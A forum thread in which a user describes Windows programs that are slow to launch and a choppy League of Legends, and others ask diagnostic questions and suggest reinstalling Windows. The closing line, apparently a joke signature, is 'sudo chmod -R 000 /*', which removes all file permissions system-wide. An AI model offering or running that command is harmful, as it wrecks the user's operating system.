Programs do not start on my computer. Er. They take multiple tries to start, and something like Overwolf won't launch in a game. My League of Legends is also choppy. The frames(60) are normal but movement, reactions, and camera are all slightly glitch like. I'm pretty sure it's related to this. This thread may also be related to my "Sluggish and Buggy Windows" post. What's going on?

You haven't really given us much to work with there.

How long have these problems been happening?

Have you installed any new software that coincides with the problems starting?

Are there any processes running that you don't recognise, or are using a lot of resources?

Have you checked your drives SMART status to ensure a drive isn't failing?

When was the last time you did a full antivirus scan?

It's been happening for two days now. I did try to check my drives, but as with my last thread they seem fine. I don't think I got a virus as I usually only download from trusted sources.

No change.

If you can, try reinstalling windows. If it doesn't solve the problem at least we'll know it's a hardware issue.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
